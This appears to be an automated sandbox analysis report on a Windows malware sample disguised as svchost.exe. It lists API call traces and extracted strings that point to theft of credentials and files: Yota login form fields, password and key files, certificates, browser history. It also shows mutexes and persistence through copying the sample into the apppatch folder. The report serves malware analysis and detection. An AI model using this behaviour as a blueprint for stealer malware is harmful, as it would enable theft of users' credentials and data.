                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC810830A402246BE7229B34EC59FDA3BA99F55B04F1844A5F985D7340EBB0ED48CBB1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D27A00: IsUserAnAdmin.SHELL32 ref: 02D27A0A
                                                                                                                                                                                                                  • Part of subcall function 02D27A00: memset.MSVCRT ref: 02D27A41
                                                                                                                                                                                                                  • Part of subcall function 02D27A00: memset.MSVCRT ref: 02D27A59
                                                                                                                                                                                                                  • Part of subcall function 02D27A00: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,74DEF380), ref: 02D27A7B
                                                                                                                                                                                                                  • Part of subcall function 02D27A00: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,74DEF380), ref: 02D27AA1
                                                                                                                                                                                                                  • Part of subcall function 02D27A00: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,74DEF380), ref: 02D27B2D
                                                                                                                                                                                                                  • Part of subcall function 02D27A00: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,74DEF380), ref: 02D27B34
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02D27E85
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D27E92
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02D27EA4
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D27EAD
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D27EC5
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D27ED7
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,A1633C7Da,a1633cfca), ref: 02D27EE2
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D27EE5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27EF2
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D27EF5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,A1633C7Da,a1633cfca), ref: 02D27F02
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D27F05
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27F12
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D27F15
                                                                                                                                                                                                                • SetCaretBlinkTime.USER32(000000FF), ref: 02D27F27
                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 02D27F55
                                                                                                                                                                                                                • StrToIntA.SHLWAPI(00000000,A1633C7Da,a1633cfca), ref: 02D27F85
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,A1633C7Da,a1633cfca), ref: 02D27F95
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D27F98
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27FA5
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D27FA8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,A1633C7Da,a1633cfca), ref: 02D27FB5
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D27FB8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27FC5
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D27FC8
                                                                                                                                                                                                                • Sleep.KERNEL32(00001388,A1633C7Da,a1633cfca), ref: 02D27FD3
                                                                                                                                                                                                                • closesocket.WS2_32(?), ref: 02D28005
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 02D28025
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02D2803D
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D2804F
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D28072
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D2808C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$AdminAllocBlinkCaretQueryTimeUserValueclosesocket
                                                                                                                                                                                                                • String ID: A1633C7Da$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}$a1633cfca
                                                                                                                                                                                                                • API String ID: 2871222221-3250897629
                                                                                                                                                                                                                • Opcode ID: f9517c2dae9823d6faf4d673c128cca5446e3a120ca04128b265acdbf1d96499
                                                                                                                                                                                                                • Instruction ID: 283b17e2846d36599c0ddbf63a11638ca5871b55b10f72b95caf65ea06441ce4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9517c2dae9823d6faf4d673c128cca5446e3a120ca04128b265acdbf1d96499
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68519031A88321ABE720AB70EC4DF6BB769AF55B59F544904F909863C0DB74CC58CAB1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D3C36F
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3C3A7
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3C3E7
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3C3F1
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3C3F9
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3C40A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3C411
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,crypto), ref: 02D3C423
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,self.cer), ref: 02D3C436
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,self.pub), ref: 02D3C447
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02D3C492
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02D3C49F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastPath$AdminAttributesBackslashCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                                • String ID: 5E8DC08D$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$crypto$keys.zip$path.txt$self.cer$self.pub
                                                                                                                                                                                                                • API String ID: 3980609930-1879590787
                                                                                                                                                                                                                • Opcode ID: 42ebc6c67f4dd1a5294142cfd671ad249b08ff7755e7f74fad56373381243497
                                                                                                                                                                                                                • Instruction ID: 7fb08d3de6c03de2d6ccab4185f6e265ba1616061a04c676ad5afee5f44db43c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42ebc6c67f4dd1a5294142cfd671ad249b08ff7755e7f74fad56373381243497
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6913531D50219AFDB269B74E85CBEA3BA5AF49704F044496E889E7340DB70DD84CBB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D44123
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D44136
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D44149
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D2A0), ref: 02D44177
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D2A0), ref: 02D441AD
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02D4420D
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D44217
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D4421F
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D44230
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D44237
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02D44244
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D44277
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D2A0), ref: 02D442A7
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D442E1
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D442EB
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D442F3
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D44304
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D4430B
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02D44318
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214},00000000,00000001), ref: 02D4434E
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 02D4435F
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D44366
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D44378
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D44389
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$DirectoryErrorLaststrstr$BackslashCreate$AdminCurrentFolderHandleMakeMutexSystemUser$CloseInformationReleaseSleep
                                                                                                                                                                                                                • String ID: IDToken1=$IDToken2=$Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}$YotaConfirmForm%5Bpassword%5D$login.yota.ru$pass.txt$pass2.txt
                                                                                                                                                                                                                • API String ID: 1263884631-1052718204
                                                                                                                                                                                                                • Opcode ID: 5bf064b028154867ff6d078ff75b2e012a2fa49671475fd26b0207631954d72c
                                                                                                                                                                                                                • Instruction ID: 3668eff4636a9c882e6a7e47e8f897598b75b3c79f2f17a4a996c2618514f065
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bf064b028154867ff6d078ff75b2e012a2fa49671475fd26b0207631954d72c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23711131A402156BDB219B74B86CBFA7BA9AF51705F548554ECC6E7300EFA0DDC8CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,?), ref: 02D3235C
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02D32367
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,02D32B46,02D32B47), ref: 02D323C3
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02D323CE
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 02D32423
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02D32447
                                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 02D32461
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$File$BackslashCreateFolder$Pointer
                                                                                                                                                                                                                • String ID: ***************************$ ***************************$) - $A1633E0Ba$HH:mm:ss$a1633ec9a$dd:MMM:yyyy
                                                                                                                                                                                                                • API String ID: 1731142794-4284199273
                                                                                                                                                                                                                • Opcode ID: dea38a48d442f558fcb6c61dbe464aac63f0df5a53b9e20a612438fe0a26379f
                                                                                                                                                                                                                • Instruction ID: 2bc2b06251a7f646ef1a443c7f05ce788330cad634965e1b67f947e894ef95d9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dea38a48d442f558fcb6c61dbe464aac63f0df5a53b9e20a612438fe0a26379f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50B12832A443466BDB228A24DC6DBBB7BE5EF85704F144518FDC59B380DB71AD09C7A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D3E64E
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc1e5), ref: 02D3E67A
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3E6BD
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3E6C3
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3E6CB
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3E6DC
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3E6E3
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02D3E71B
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02D3E728
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc1e5,?,?), ref: 02D3E767
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02D3E7A5
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3E7AC
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3E7B4
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02D3E7C5
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3E7CC
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 02D3E806
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02D3E831
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000000,?), ref: 02D3E855
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 02D3E866
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D3E86D
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D3E87F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D3E890
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D3E89F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D3E8A2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D3E8AF
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D3E8B2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorHeapLastPath$CreateDirectoryFile$AdminAttributesBackslashFolderHandleMakeMutexProcessSystemUser$CloseCurrentDeleteFreeInformationReleaseSleepValidatememset
                                                                                                                                                                                                                • String ID: 5e8dc1e5$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$keys.zip$path.txt
                                                                                                                                                                                                                • API String ID: 1472338570-2927371403
                                                                                                                                                                                                                • Opcode ID: 39c516a9f23e585f1b52e90cea1156be74716142750e50589a5d56d935702312
                                                                                                                                                                                                                • Instruction ID: 2df0fe71f687b005e3dce086632dba6fa2523cfe51f6e5eb2c91fab54a52de63
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39c516a9f23e585f1b52e90cea1156be74716142750e50589a5d56d935702312
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D171F270D403559FDB228B34E86CBEA7FA8AF85701F588994E985D7381DB70DD84CBA0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: open$taskmgr
                                                                                                                                                                                                                • API String ID: 0-1543563666
                                                                                                                                                                                                                • Opcode ID: 89b96e7f90ebd62047a37a4cda1975f525c13cf6610d593eb3800a1cc4724a68
                                                                                                                                                                                                                • Instruction ID: d32eeda125f058160be75b8cc82cb7f94b728b1d88e3b34892b6009c86ddb7bb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89b96e7f90ebd62047a37a4cda1975f525c13cf6610d593eb3800a1cc4724a68
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F910836A80214EFC714DF68F88CEAA7778EB59319F504555F945A7380C7319C58CBB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?,?,00000000,75B0A250), ref: 02D25B11
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02D25B4D
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02D25B5A
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02D25B79
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000022,00000000,00000000,?), ref: 02D25B99
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 02D25C20
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D25C23
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D25C30
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D25C33
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02D25C48
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 02D25CD2
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D25CD5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D25CE2
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D25CE5
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25D32
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,02D33674,00000000), ref: 02D25D41
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02D3365B,02D33674,00000000,00000000), ref: 02D25D56
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,02D33674,00000000), ref: 02D25D63
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25D7A
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25D8A
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02D65CF4,00000002,00000000,00000000), ref: 02D25D9E
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25DAC
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D25DD2
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D25DE3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Heap$Process$Path$FolderFreeHandleLockPointerUnlockValidateWrite$AttributesBackslashCloseCreateDeleteInformation
                                                                                                                                                                                                                • String ID: \History.IE5\index.dat$\Opera\Opera\typed_history.xml$http$http$links.log
                                                                                                                                                                                                                • API String ID: 2678947633-2852051092
                                                                                                                                                                                                                • Opcode ID: 95ad512653328ce0643a55bf843a9868be77e14329fb297558ac2783473edc8f
                                                                                                                                                                                                                • Instruction ID: 110862b234437d7b01191eea63d69bc530798447a9f9790014a9fa9cbdad6510
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95ad512653328ce0643a55bf843a9868be77e14329fb297558ac2783473edc8f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B591E771940315BBDB248B60AC4DFEB7BB9EF54708F908544F645AB380DB70AD49CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(00401F70,?,0000001C,7604DB30,00000000,00000000), ref: 004028EB
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402903
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 00402924
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040293C
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040297D
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040298D
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 0040299E
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004029D6
                                                                                                                                                                                                                  • Part of subcall function 00401600: GetTickCount.KERNEL32 ref: 0040160B
                                                                                                                                                                                                                  • Part of subcall function 00401600: GetModuleHandleA.KERNEL32(ntdll.dll,?,004029E2,00000000), ref: 0040161C
                                                                                                                                                                                                                  • Part of subcall function 00401600: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 0040162C
                                                                                                                                                                                                                  • Part of subcall function 00401920: GetTickCount.KERNEL32 ref: 0040194A
                                                                                                                                                                                                                  • Part of subcall function 00401920: GetModuleHandleA.KERNEL32(ntdll.dll,?,004029EE,-00000006,00000000), ref: 00401957
                                                                                                                                                                                                                  • Part of subcall function 00401920: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401963
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00402A50
                                                                                                                                                                                                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00402A68
                                                                                                                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 00402A9A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402AC5
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00402AC8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402AD4
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00402AD7
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402AF6
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B05
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B15
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00402B26
                                                                                                                                                                                                                • GlobalFindAtomA.KERNEL32(Tue Aug 2 12:53:17 20111), ref: 00402B44
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402B55
                                                                                                                                                                                                                • GlobalAddAtomA.KERNEL32(Tue Aug 2 12:53:17 20111), ref: 00402B60
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                                • String ID: %s_$.exe$IsWow64Process$Tue Aug 2 12:53:17 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                                • API String ID: 4049655197-1703505012
                                                                                                                                                                                                                • Opcode ID: 316ab541766f69de20ede4138c7f30c1feb611c6e1e8b9ea983fb4f01bd77043
                                                                                                                                                                                                                • Instruction ID: 7f5ae7708a7b69610b0b59458e4d7764c7ebe7900fbd9078b2849b4018493b30
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 316ab541766f69de20ede4138c7f30c1feb611c6e1e8b9ea983fb4f01bd77043
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A715EB16043419FC710EF60DE889AB7BE8BB98300F44493EF785B72A1D7789904CB99
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: malloc$free$fclosefopenfreadsprintf$callocfseekrealloc
                                                                                                                                                                                                                • String ID: %s.DBF$%s.dbf$r+b$rb+
